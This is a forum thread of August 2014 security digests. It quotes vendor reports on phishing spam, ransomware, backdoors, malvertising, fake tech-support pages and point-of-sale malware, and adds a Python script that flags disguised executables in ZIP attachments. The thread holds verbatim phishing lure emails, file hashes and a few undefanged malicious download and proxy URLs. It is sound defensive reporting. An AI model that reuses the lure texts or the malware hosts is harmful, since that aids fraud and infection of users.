- http://myonlinesecur...ke-pdf-malware/
14 Aug 2014 - "'Citibank RE: Account documents' have been uploaded pretending to come from Citibank <noreply@ citibank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like"
    citibank .com
    RE: Account Documents
    To: <REDACTED>
    Case: C4055427
    Your Documents have been uploaded to dropbox. In order to download / view Please click here to download / view .
    All web filed documents (with the exception of downloaded accounts templates) are available to view / download for 10 days after their original submission. Once accepted, these changes will be displayed on the public record...


14 August 2014 Document-7119.zip ; Extracts to Document-7119.scr ;
Current Virus total detections: 0/54* . This 'Citibank RE: Account documents have been uploaded' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408029154/
___

ZeroLocker
- http://www.webroot.c...14/zero-locker/
Aug 14, 2014 - "... we saw FireEye and Fox-IT provide the ability to decrypt files encrypted by older cryptolocker variants. They used the command and control servers seized by the FBI during operation Tovar. Since they have access to those RSA keys they essentially have the password required for every single file encrypted by a Cryptolocker variant that used Evgeniy Bogachev’s botnet. That is a major portion of the traditional red GUI cryptolocker that became famous... since the emergence of their tool to decrypt files for free, there has been a new encrypting ransomware going around that aims at scamming you into thinking this is a similar helpful tool – except that it demands something all -scams- do - payment:
> https://www.webroot....08/blograrw.bmp
This newest addition to the ever popular business model that is encrypting ransomware doesn’t really have many improvements over the others we’ve already seen. Using -Bitcoin- for payment is standard now. This variant doesn’t show the GUI until all encryption is completed and the computer is suddenly restarted. Upon restart this window is presented and threatens that you will lose all your files if you close or remove it. The payment structure is right where industry average is – PAINFUL. This specific variant we analyzed does not delete the VSS (Volume Shadow Service) and you can get all your files back by using programs like Shadow Explorer... expect issues like this to be fixed once this malware is adopted by more botnets for widespread distribution... remember that with encrypting ransomware the best protection is going to be a good backup solution. This can be either through the cloud or offline external storage. Keeping it up to date is key so as not to lose productivity..."
___

Suspicious login message Faked, distributes Backdoor
- http://blog.trendmic...butes-backdoor/
Aug 14, 2014 - "Legitimate services are often used by cybercriminals to try and make their attacks more convincing. Recently, I spotted attacks that used services and platforms like Google Drive and Dropbox in order to look less suspicious to unwary users. I received a spammed message like the one shown right below that supposedly came from Gmail itself. It warned me that someone logged into my account from an unknown device. However, all of the links in it pointed to a Google Drive URL:
Sample spam email:
> http://blog.trendmic...4/08/login3.png
Even though the email message is -similar- to a legitimate Gmail message, a careful user will note that the displayed e-mail address and the supposed source address did -not- match. Further examination of the email’s headers indicates that the email was, in fact, sent via a website’s mail form... all the links provided in the email actually go to an HTML file hosted on Google Drive. This HTML file is used to detect the operating system and browser of the user... Further code also differentiates what payloads are delivered based on the user’s browser. This is what the user would see (here, running Firefox):
Fake plugin download page:
> http://blog.trendmic...4/08/login2.png
... while the HTML code can differentiate between different configurations, a relatively limited number of payloads are actually delivered. These are detected as BKDR_PERCS.A. This -backdoor- steals email credentials and user names and passwords. It also logs -keystrokes- as part of its information theft routines. As a backdoor, it can also accept remote commands from the attackers... The actual malicious payloads are hosted on Google Drive as well. The attackers upload new files to be used in this attack on a fairly regular basis, although the behavior remains the same... As these files are located on legitimate services, they are also sent via HTTPS, which helps evade some web filtering techniques. In addition, it used a -compromised- website’s mailer system and an IPv6 address, which can also evade email reputation services..."
(More detail at the trendmicro URL at the top.)
___

Beware of Risky Ads on Tumblr
- https://blog.malware...-ads-on-tumblr/
Aug 14, 2014 - "Online users have come to rely on social media and social networking sites to also update them on current events and commentaries, general news, and what’s happening just down the street and around the corner. Twitter and Facebook are the first go-to sites for most when it comes to real-time news updates. For some, Tumblr.

dailynewsz[dot]tumblr[dot]com

We found the above site posting what appears as news clips but not on a daily basis, as indicated in the URL, unfortunately. According to Google Translate, the site uses both Swahili and Urdu. This site serves ads on its default page and on individual posts. So every time someone shares one, the ads are shared with it. Below is a screenshot of a post:
> https://blog.malware...ynewsz-post.png
Online advertisement is a major source of revenue. Unfortunately, normal ads can easily become malvertisements, serving as a go-between for users and sites hosting -malicious- software. For this particular Tumblr page, it uses the ad network Yllix Media. Google Safe Browsing profiled its official website here*. Other third-party sites either blacklist** the domain or flag it as untrustworthy*** due to its history of leading users to infected sites. As of this writing, the ads are benign, but we may never know several months from now if this will still be the case... we encourage you to use ad blockers, such as AdBlock Plus (ABP) or NoScript (for Mozilla-based browsers only), if you don’t want ads to appear on sites you visit..."
* https://safebrowsing...site=yllix.com/

** http://labs.sucuri.n...klist=yllix.com

*** https://www.mywot.co...ecard/yllix.com
 



Edited by AplusWebMaster, 14 August 2014 - 04:50 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1257 AplusWebMaster


Posted 15 August 2014 - 09:03 AM

FYI...

Fake Barclays SPAM - Trojan.Ransom.ED
- http://blog.mxlab.eu...ojan-ransom-ed/
Aug 15, 2014 - "... intercepted a new trojan distribution campaign by email with the subject “Your transaction is completed”. This email is sent from the spoofed address “Barclays.NET” <support@ barclays .net> and has the following body:
    Transaction is completed. 8678 GBP has been successfully transfered.
    If the transaction was made by mistake please contact our customer service.
    Payment receipt is attached.
    *** This is an automatically generated email, please do not reply ***
    Barclays.Net 2013 Corporation. All rights reserved.


The attached ZIP file has the name Payment receipt 1534465.zip and contains the 70 kB file Payment receipt 8821991.exe (note: the file name may vary with each email). The trojan is known as Trojan.Ransom.ED or Mal/Generic-S. At the time of writing, 2 of the 54 engines detected the trojan at VirusTotal*..."
* https://www.virustot...sis/1408097500/
___

Fake VOIP SPAM - Word macro script
- http://blog.mxlab.eu...d-macro-script/
Aug 15, 2014 - "... intercepted a campaign by email with the subject “Your Order No 355253536 | Mob Inc.” which includes a malicious Word document that allows the installation of a trojan downloader using the macro functionality of Word. This email is sent from spoofed addresses and has the following body:
    Thank you for ordering from VOIP Inc.
    This message is to inform you that your order has been received and is currently being processed.
    Your order reference is 488910845598.
    You will need this in all correspondence.
    This receipt is NOT proof of purchase.
    We will send a printed invoice by mail to your billing address.
    You have chosen to pay by credit card. Your card will be charged for the amount
    of 805.74 USD and “VOIP Inc.”
    will appear next to the charge on your statement.
    Your purchase information appears below in the file.


The attached ZIP file has the name Order.zip and contains the 41 kB file Order.Doc. Order.Doc is a genuine Word document, but it contains a malicious macro. On opening the Word document, instructions are given on how to enable the content and so activate the -malicious- macro script... The downloader is known as W97M/Downloader, MO97:Downloader-DU, VBA/TrojanDownloader.Agent.AL, Trojan-Downloader:W32/Agent.DVCR, Trojan-Downloader.VBA.Agent or Trojan.Mdropper. At the time of writing, 8 of the 53 AV engines detected the trojan downloader at VirusTotal*..."
* https://www.virustot...sis/1408099896/
 





#1258 AplusWebMaster


Posted 19 August 2014 - 12:01 PM

FYI...

Fake Companies House Spam
- http://threattrack.t...ual-return-spam
Aug 19, 2014 - "Subjects Seen:
    (AR01) Annual Return received
Typical e-mail details:
    Thank you for completing a submission Reference # (9586474).
        (AR01) Annual Return
    Your unique submission number is 9586474
    Please quote this number in any communications with Companies House.
    Check attachment to confirm acceptance or rejection of this filing.


Malicious File Name and MD5:
    AR01_021434.scr (3324B40B5D213BEC291F9F86F0D80F64)
    AR01_021434.zip (7D65D78B6E35843B6FF3C4C46BAAC37A)


Screenshot: https://gs1.wac.edge...ZubX1r6pupn.png

Tagged: Companies House, Upatre
___

JPMorgan Chase Secure Message Spam
- http://threattrack.t...re-message-spam
Aug 19, 2014 - "Subjects Seen:
    Daily Report - August 19, 2014
Typical e-mail details:
   This is a secure, encrypted message.
    Desktop Users:
    Open the attachment (message_zdm.html) and follow the instructions.
    Mobile Users:
    Voltage secure mail is not currently supported on mobile devices. If you experience issues, please access your secure message from a fully functional browser.


Malicious URLs:
    192.241.124.71 /securemail/jpmchase.com/formpostdir/Java/Java_update.exe

Malicious File Name and MD5:
    message_zdm.html (550CB01F07DB2363437C8627697C6B1F)
    Java_update.exe (38d75db0a575891506b1ff0484a03cd0)


Screenshot: https://gs1.wac.edge...JVOT1r6pupn.png

192.241.124.71: https://www.virustot...71/information/

Tagged: JPMorgan, Chase, Dyreza
___

- http://myonlinesecur...9-2014-malware/
Aug 19 2014 - "'JPMorgan Chase & Co Daily Report – August 19, 2014' pretending to come from various names at @ jpmorgan .com is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... email looks like:

Screenshot: http://myonlinesecur...ust-19-2014.png

... the HTML attachment that comes with the email looks like the below, and clicking the link hidden behind the "Click to read message" button leads to a fake Java_update.exe
> http://myonlinesecur...t-19-2014_2.png
Today's date: Java_update.exe .. Current VirusTotal detections: 5/53*
All of these emails use social engineering tricks to persuade you to open the attachments that come with the email... be careful when unzipping them and make sure you have “show known file extensions enabled“, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustot...12a96/analysis/
___

Fake Evernote extension serves Ads
- https://blog.malware...advertisements/
Aug 19, 2014 - "... a Multiplug PUP that installs a -fake- Evernote browser extension. Fellow researchers can find the link to this sample on VirusTotal here*...
> https://blog.malware...8/cert_info.png
When you execute the PUP, it silently installs a web extension for the Google Chrome, Torch, and Comodo Dragon browsers. The extension takes the form of three obfuscated JavaScript files and one HTML file. The picture shows these files installed in Chrome’s extension directory on a Windows 7 PC.
> https://blog.malware...e_ext_files.png
... The extension that’s installed is called “Evernote Web,” just like the real extension from Evernote.com. When taking a look at the Chrome extensions page, we can see the extension installed there with the ID “lbfehkoinhhcknnbdgnnmjhiladcgbol,” just like the real Evernote Web extension.
> https://blog.malware...08/evernote.png
Clicking “Visit website” directs the user to the Chrome Web Store page for the actual Evernote Web extension. Chrome believes the real extension is installed, as verified by the Launch App button. When clicking this button with the fake extension installed, nothing happens, whereas normally the user is met with an Evernote login screen.
> https://blog.malware...hrome_store.png
On the surface, it may seem like the pop-ups and advertisements are coming from the websites themselves, but they are in fact from the fake Evernote Web extension.
Fortunately, removing the extension is a simple task. For Chrome users, simply visit the extensions page and click the picture of a garbage can, and you’re done. You also might want to run a free scan using your Antivirus or Anti-malware programs (like Malwarebytes Anti-Malware) to make sure there wasn’t anything -else- added while you had the extension."
* https://www.virustot...3fbf4/analysis/
___

Fake Scotiabank SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
18 Aug 2014 - "Scotiabank New Instructions for International and local transfers pretending to come from Mallerlyn Bido <mallerlyn.bido@ scotiabank .com> is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Dear Clients
    Hereby we inform you that starting next Tuesday, August 19 all instructions of local and international transfers that are sent to our institution must be completed by a transfer form specifically allocated for the purpose, which will be replacing the letter instruction tend to complete.
    This new document has been implemented to meet international requirements and simultaneously control to make their operations safer.
    We take this opportunity to inform you that the operations of International Transfers can be made via our internet platform banking the need to complete these types of forms.
    Annex find the forms that apply to transfers in USD and EUR as well as the form used for ACH transfers manuals with some notes to use as a guide to complete. These templates can be saved for you with your details for future use.(See attached file: Outgoing Global.doc Form) (See attached file: Outgoing JPM.doc Form) (See attached file: Form ACH..doc) ...
Best regards,
Mallerlyn Bido | Gerente Soporte al Cliente | BSC ...


18 August 2014: New Instructions for International and Local transfers.zip ( 8kb) :
Extracts to New Instructions for International and Local transfers.exe
Current Virus total detections: 3/52* . This Scotiabank New Instructions for International and local transfers is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408393889/
 



Edited by AplusWebMaster, 19 August 2014 - 06:49 PM.



#1259 AplusWebMaster


Posted 20 August 2014 - 05:58 AM

FYI...

Cryptolocker flogged on YouTube
- http://www.theregist...ged_on_youtube/
20 Aug 2014 - "Cryptolocker is being flogged over YouTube by vxers who have bought advertising space... researchers made the discovery while monitoring YouTube and website banners for instances where malware writers had actually purchased space to foist their wares on -unpatched- web users. The duo, who will present at the upcoming Virus Bulletin 2014 conference in Seattle, wrote in a paper that advertising networks were a viable way to flog viruses and trojans. "We conclude that ad networks could be leveraged to aid, or even be substituted for current exploit kits," they said. Purchased ad space was a cheap and effective means of foisting browser malware, allowing attackers to filter victims by language, location, and interests, VB reported. Malware contained in ads could be obfuscated and then unleashed once conditions like operating systems, browser versions and other elements were met.
> http://regmedia.co.u...19/tghfgh55.png
CryptoLocker surfaced in September distributed through Gameover ZeuS. It encrypted important files such as images and documents on compromised Windows machines before demanding that victims pay up to $500 in Bitcoins within 72 hours for the private keys necessary to unlock files. CryptoLocker used AES symmetric cryptography to encrypt the files and encrypted the AES key with an RSA-2048 bit public key generated on its server side. It came as -malvertisers- were caught flinging malware over Yahoo! ad networks*...
> http://regmedia.co.u.../fghji87y6t.png
... Many excess ad spaces were flogged through affiliates which may accept advertisements without checking the authenticity of the buyer nor the code to be run. Even those that do could end up foisting malware if they failed to detect an attacker's code alterations made after the purchase in order to quietly slip in the malware. The research pair said there was very little advertising networks could do to prevent the attacks."
* http://www.theregist...hoo_ad_network/

> https://www.virusbtn...otovNavaraj.xml
___

Fake Order SPAM – PDF malware
- http://myonlinesecur...er-pdf-malware/
20 Aug 2014 - "'Order – PDF', which comes as an email with a subject of order-6539-8.20.2014.pdf (where the number is random and the date changes daily), is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... These emails have no body content and just a subject of order-6539-8.20.2014.pdf (the number is random). They appear to come from a load of common first names with weird characters forming the second part of the alleged senders... previous post about this type of attack:
- http://myonlinesecur...chments-emails/
Today’s version, although it pretends to be a PDF file, is actually a zip file that probably either uses some unknown exploit to extract it, or the bad actors sending today’s malware have misconfigured the botnet sending it and it won’t automatically extract at all, so users will be safe...
20 August 2014: order-6539-8.20.2014.pdf (84 kb) Extracts to order 8.20.2014.exe
Current Virus total detections for pdf is : 2/50* . Current Virus total detections for the extracted .exe : 2/53** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408523288/

** https://www.virustot...sis/1408523722/
___

'Reveton' ransomware adds powerful password stealer
- https://www.computer...assword_stealer
Aug 20, 2014 - "A type of malware called Reveton, which -falsely- warns users they've broken the law and demands payment of a fine, has been -upgraded- with powerful password stealing functions, according to Avast*. Reveton is in a class of nasty programs known as "ransomware," which includes the notorious Cryptolocker program that encrypts a computer's files. The FBI issued a warning about Reveton in August 2012 after its Internet Crime Complaint Center was flooded with complaints. The malware often infects computers via drive-by download when a person visits a website rigged to automatically exploit software vulnerabilities. Users are helpless after the computer is locked, with Reveton demanding a few hundred dollars as ransom, payable via various web-money services... The version of Reveton analyzed by Avast also has another password stealer from the Papras family of malware. It's not as effective as Pony but can disable security programs, the company wrote on its blog*. This particular sample of Reveton was pre-programmed to search a web browser's history and cookies to see if the user had visited online sites of 17 German banks... Around February 2013, an ethnic Russian man was arrested in Dubai upon request of Spanish police for allegedly coordinating Reveton campaigns, netting... US$1.3 million. Ten other people were also arrested on money laundering charges for allegedly laundering the proceeds and transferring funds to Russia, according to Trend Micro**."
* http://blog.avast.co...rously-evolved/

** http://blog.trendmic...ivity-nabbed-2/
___

Linux Trojan makes the jump to Windows
- http://www.theinquir...jump-to-windows
Aug 20 2014 - "... the original malware known as "Linux.Dnsamp" is a Distributed Denial of Service (DDoS) Trojan, which, according to the company blog*, transfers between Linux machines, altering the startup scripts, collecting and sending machine configuration data to the hackers' server and then running silently waiting for orders. Now it appears that the same hackers have ported the Trojan to run in Windows as "Trojan.Dnsamp.1"**. The Windows version gains entry to the system under the guise of a Windows Service Test called "My Test 1". It is then saved in the system folder of the infected machine under the name "vmware-vmx.exe". When triggered, just like its Linux counterpart, the Trojan sends system information back to the hackers' central server and then awaits the signal to start a DDoS attack or start downloading other malicious programs... Although the threat of malware is an everyday hazard to most computer users, to find an attack on Linux is much rarer, and to find any kind of malware that has been ported from one operating system to another is almost unheard of... Project Shield***, an initiative designed to help smaller web servers fight off DDoS attacks."
* http://news.drweb.co...c=23&lng=en&p=1

** http://news.drweb.co...903&lng=en&c=14

*** https://projectshiel...hgoogle.com/en/
 



Edited by AplusWebMaster, 20 August 2014 - 02:23 PM.



#1260 AplusWebMaster


Posted 21 August 2014 - 08:26 AM

FYI...

Tech Support SCAMS rip big brand security software with fake warnings
- https://blog.malware...-fake-warnings/
Aug 21 2014 - "... bogus tech support. If you are looking to download one of the popular antivirus or anti-malware products on the market, watch out before you click.
> https://blog.malware...AVs-965x395.png
Lookalike pages: Fraudsters have set up -fake- download pages that look incredibly like the authentic ones... Hijacked software: Each page links to a download, which of course is -not- the actual software...
> https://blog.malware...07/software.png
The purpose of these fake programs is to trick people into thinking something is wrong with their computers:
> https://blog.malware...14/07/error.png
The fake pages are hosted here:
hzzzp ://onlineinstanthelp .com/antivirus-download.html
hzzzp ://onlineinstanthelp .com/norton-us/download.html
hzzzp ://onlineinstanthelp .com/mcafee-us/download.html
hzzzp ://onlineinstanthelp .com/avg-us/download.html
hzzzp ://onlineinstanthelp .com/malwarebytes-us/download.html
hzzzp ://onlineinstanthelp .com/winzip-us/download.html
hzzzp ://onlineinstanthelp .com/lavasoft-us/download.html
The company providing ‘support’ is: wefixbrowsers .com ... We are reporting the sites to the registrar and passing on the LogMeIn codes so that interested parties can take appropriate actions. To avoid these -fake- installers, users should always go to the company’s official website..."
(More detail at the malwarebytes URL at the top.)

wefixbrowsers .com / 23.91.123.204: https://www.virustot...04/information/

onlineinstanthelp .com / 118.139.186.35: https://www.virustot...35/information/
___

Fake HMRC SPAM - malware
- http://myonlinesecur...-onile-malware/
21 Aug 2014 - "'Helping your Business onile' pretending to come from 'HMRC Business Help and Education Emails' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:

Screenshot: http://myonlinesecur...iness-onile.png

21 August 2014  Credit_file_961529461.zip ( 50 kb)... Current Virus total detections: 1/51*
...  targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled“, And then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened..."
* https://www.virustot...sis/1408620337/
___

Fake Credit reference SPAM - word Doc malware
- http://myonlinesecur...rd-doc-malware/
21 Aug 2014 - "'RE: Credit reference file request.(108278994)' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email reads:
    Dear <REDACTED>
    You have obtain a copy of your credit reference file.
    We’re happy to help you with any questions or concerns you may have. Please contact us directly 24/7 .
    Lynn Buck.


21 August 2014: Credit_file_108278994.zip (52 kb): Extracts to Credit reference file.doc.scr
Current Virus total detections: 2/52*
21 August 2014: Credit_file_642094175.zip (85kb): Extracts to credit_reference_file.xls.scr
Current Virus total detections: 2/52*
This 'RE: Credit reference file request.(108278994)' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word file instead of the .scr executable file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408613742/
___

JPMorgan customers targeted in phishing campaign
- http://www.reuters.c...N0GL20R20140821
Aug 21, 2014 - "Fraudsters are targeting JPMorgan Chase & Co customers in an email "phishing" campaign that is unusual because it attempts to collect credentials for that bank and also infect PCs with a virus for stealing passwords from -other- institutions. The campaign, dubbed "Smash and Grab," was launched on Tuesday with a widely distributed email that urged recipients to click to view a secure message from JPMorgan, according to security researchers with corporate email provider Proofpoint Inc. JPMorgan, the No. 1 U.S. bank by assets, confirmed that spammers had launched a phishing campaign targeting its customers... the bank believes most of the spam was stopped by fraud filters at large Internet providers, adding that the email looked realistic because the attackers apparently used a screen grab from an authentic email sent by the bank. Users who click on a malicious link are asked to enter credentials for accessing accounts with JPMorgan. Even if they did not comply, the site attempted to automatically install the Dyre banking Trojan* on their PCs, according to Proofpoint. Dyre is a recently discovered piece of malware that seeks credentials from customers of Bank of America Corp, Citigroup Inc and the Royal Bank of Scotland Group PLC, according to email security firm Phishme."
* http://blog.malcover...ou-need-to-know

> https://www.brainyqu...infr122731.html
"Distrust and caution are the parents of security" - Ben Franklin
 



Edited by AplusWebMaster, 21 August 2014 - 03:23 PM.

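Several of the reports quoted above (the Scotiabank .exe carrying a PDF icon, the credit reference .doc.scr and .xls.scr, the Companies House and ADP .scr files) rely on one trick: an executable extension hidden behind a document-looking name, which Windows conceals unless "show known file extensions" is on. The following is an added example, not code from any of the quoted blogs, that triages a ZIP attachment server-side by two independent signals: the member name (last extension, and a document extension immediately before it) and the PE "MZ" magic at the start of the file, so a renamed executable is caught even when the name is clean. The sample archive is constructed inline with harmless stand-ins (not real malware), and the extension lists are an assumed practical subset rather than an exhaustive catalogue.

```python
"""Triage a ZIP e-mail attachment for executables disguised as documents.

Added example; the extension sets are an assumed subset, not exhaustive.
"""
import io
import zipfile

# Extensions Windows runs on double-click (assumed practical subset).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js", ".jar"}
# Extensions the lure usually pretends to be (assumed practical subset).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".rtf", ".txt", ".jpg", ".png"}


def classify_name(member_name):
    """Classify a ZIP member by its file name alone."""
    base = member_name.replace("\\", "/").rsplit("/", 1)[-1].lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[-1]:
        return "no-extension"
    last = "." + parts[-1]
    if last in EXECUTABLE_EXTS:
        # e.g. "Credit reference file.doc.scr": a document extension
        # sits right before the real, executable one.
        if len(parts) >= 3 and "." + parts[-2] in DOCUMENT_EXTS:
            return "double-extension"
        return "executable"
    return "document"


def triage_zip(zip_bytes):
    """Return [(name, verdict, is_pe)] for every file in the archive.

    is_pe is True when the member starts with the 'MZ' DOS header, i.e.
    it is a Windows PE no matter what the name claims.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                is_pe = fh.read(2) == b"MZ"
            verdict = classify_name(info.filename)
            if verdict in ("document", "no-extension") and is_pe:
                verdict = "pe-with-misleading-name"
            findings.append((info.filename, verdict, is_pe))
    return findings


def suspicious_members(findings):
    """Member names that should never be opened from an e-mail attachment."""
    return [name for name, verdict, _ in findings if verdict != "document"]


def build_sample_zip():
    """Constructed sample archive: MZ header stub, not real malware."""
    fake_pe = b"MZ" + b"\x90" * 62
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Credit reference file.doc.scr", fake_pe)
        zf.writestr("order 8.20.2014.exe", fake_pe)
        zf.writestr("report.pdf", fake_pe)   # PE hiding behind a .pdf name
        zf.writestr("notes.txt", b"plain text, nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    for name, verdict, is_pe in triage_zip(build_sample_zip()):
        print(f"{verdict:24s} pe={is_pe!s:5s} {name}")
```

The name check alone would pass "report.pdf"; the magic check alone would pass a .scr that is a script rather than a PE. Running both, and quarantining on either, is what catches the variants the posts describe.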


#1261 AplusWebMaster


Posted 22 August 2014 - 07:44 AM

FYI...

WordPress attacks exploiting XMLRPC
- http://myonlinesecur...loiting-xmlrpc/
Aug 22, 2014 - "We are experiencing Ongoing WordPress attacks exploiting XMLRPC. There appears to be a massive attack on WordPress sites today. So far I have had almost -1600- blocked attacks against ONE of my WordPress sites... Anybody using WordPress should make sure that they are plugged and use a good security system to prevent or -block- these attacks. It appears to be using the attack mentioned in this post:
> http://blog.sucuri.n...-wordpress.html
... -None- of the current WordPress security plugins will -block- this and you need to make sure that you have a strong random password on your admin account. The -only- way to block them is on the perimeter, that is use a firewall that blocks the offending IP numbers that are responsible for the attacks. They are all coming from other compromised servers or hacked users computers..."
(More detail at the URLs above.)
___

Fake ADP 'Anti-Fraud Secure Update' SPAM – PDF malware
- http://myonlinesecur...ke-pdf-malware/
22 Aug 2014 - "'ADP: August 22, 2014 Anti-Fraud Secure Update' pretending to come from ADP_Netsecure@ adp .com  is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Email looks like:
Dear Valued ADP Client,
We are pleased to announce that ADP Payroll System released secure upgrades to your computer.
A new version of secure update is available.
Our development division strongly recommends you to download this software update.
It contains new features:
    The certificate will be attached to the computer of the account holder, which disables any fraud activity
    Any irregular activity on your account is detected by our safety centre
Download the attachment. Update will be automatically installed by double click.
We value our partnership with you and take pride in the confidence that you place in us to process payroll on your behalf. As always, your ADP Service Team is happy to assist with any questions you may have...


22 August 2014 : 2014 Anti-Fraud Secure Update_08222014.zip (9kb)
Extracts to   2014 Anti-Fraud Secure Update_08222014.exe
Current Virus total detections: 3/54* . This 'ADP: August 22, 2014 Anti-Fraud Secure Update' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1408710186/

- http://threattrack.t...aud-update-spam
22 Aug 2014 - "Subjects Seen:
    ADP: August 22, 2014 Anti-Fraud Secure Update
Typical e-mail details:

Screenshot: https://gs1.wac.edge...Ga8i1r6pupn.png

Malicious File Name and MD5:
    2014 Anti-Fraud Secure Update_08222014.scr (840B3B6A714F7330706F0C19F99D5EB8)
    2014 Anti-Fraud Secure Update_08222014.zip (AB0D93E0952BDCE45D6E6494DF4D94AD)


Tagged: ADP, Upatre
___

Backoff Point-of-Sale Malware Campaign
- https://www.us-cert....alware-Campaign
August 22, 2014 - "US-CERT is aware of Backoff malware compromising a significant number of -major- enterprise networks as well as small and medium businesses. US-CERT encourages administrators and operators of Point-of-Sale systems to review the Backoff malware alert* to help determine if your network may be affected. Organizations that believe they have been infected with Backoff are also encouraged to contact their local US Secret Service Field Office."
* https://www.us-cert....lerts/TA14-212A
Last revised: Aug 22, 2014 - "... the Secret Service currently estimates that over 1,000 U.S. businesses are affected..."

Backoff malware Q&A
- https://www.trustwav...malware-danger/
"In light of a recent string of breaches involving a new point-of-sale malware family that our Trustwave researchers identified and named "Backoff," we have received many questions about the threat and how businesses can protect themselves..."
- https://gsr.trustwav...lware-overview/
___

"FlashPack" - add-on targets Japanese users, leads To exploit kit
- http://blog.trendmic...to-exploit-kit/
Aug 21, 2014 - "... In order to affect users, this particular exploit kit does -not- rely on spammed messages or compromised websites: instead, it uses a compromised website add-on. This particular add-on is used by site owners who want to add social media sharing buttons on their sites. All the site owner would have to do is add several lines of JavaScript code to their site’s design template. This code is freely available from the website of the add-on. The added script adds an overlay like this to the site’s pages:
Added share buttons:
> http://blog.trendmic.../08/toolbar.png
To do this, a JavaScript file on the home page of the add-on is loaded. This alone should raise red flags: it means that the site owner is loading scripts from an external server -not- under their control. It’s one thing if it loads scripts on trusted sites like Google, Facebook, or other well-known names; it’s another thing to load scripts on little-known servers with no name to protect. As it turns out, this script is being used for malicious purposes. On certain sites, instead of the original add-on script, the user is redirected to the script of FlashPack... loading the s.js file directly will simply load the “correct” script for the add-on. One site which, if found in the Referer header, will trigger the exploit kit is a well-known free blogging site in Japan. The exploit kit delivers various Flash -exploits- to -targeted- users... At least approximately 58,000 users have been affected by this attack, with more than 87% of these coming from Japan. The landing pages of the exploit kit are hosted in servers in the Czech Republic, the Netherlands, and Russia.
Number of hits by country from August 1 to 17
> http://blog.trendmic...-Country-01.jpg
How can users and site owners prevent these attacks? Site owners should be very cautious about adding add-ons to their site that rely on externally hosted scripts. As shown in this attack, they are trivial to use in malicious activities. In addition, they can slow the site down as well. Alternatives that host the script on the same server as the site itself are preferable. This incident illustrates for end users the importance of keeping-software-patched. The vulnerability we mentioned above has been fixed for half-a-year. Various auto-update mechanisms exist which can keep Flash up-to-date..."
 



Edited by AplusWebMaster, 22 August 2014 - 09:30 PM.

This machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#1262 AplusWebMaster

Posted 24 August 2014 - 05:26 AM

FYI...

My Photos SPAM - malware
- http://myonlinesecur...photos-malware/
23 Aug 2014 - "'My Photos' is another one from the current zbot runs which try to drop cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... Very simple email with content just saying 'Please find attached photos of my birthday party.' This one is particularly nasty and dangerous because it doesn’t give any outward signs of infection. It downloads an auto-configure script from http ://construtoralondres.zip .net/JScript32.log which then attempts to send all traffic through a proxy server http ://supermercadorleves.ddns .net which then filters out UK banking traffic to another proxy where they can steal all your banking log on and account information. Each UK bank is sent to a -different- proxy where the sites are set up to intercept traffic to the genuine UK bank site. That way, you think that you are on the genuine UK bank site and you actually are, but the proxy between you and the bank can read -everything- you type or do on the bank site. You have absolutely no idea that this is happening & you still get a padlock in the address bar to say that you are on a safe site.

23 August 2014: My Photos.zip ( 8kb): Extracts to My Photos.exe
Current Virus total detections: 10/50*. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email. Whether it is a message saying “look at this picture of me I took last night” and it appears to come from a friend or is more targeted at somebody who regularly is likely to receive PDF attachments or Word .doc attachments or any other common file that you use every day. Be very careful when unzipping them and make sure you have “show known file extensions enabled”, and then look carefully at the unzipped file. If it says .EXE then it is a problem and should -not- be run or opened."
* https://www.virustot...sis/1408799346/

zip .net / 200.147.99.195: https://www.virustot...95/information/
- http://quttera.com/d..._report/zip.net
Submission date: Aug 24 16:53:51 2014
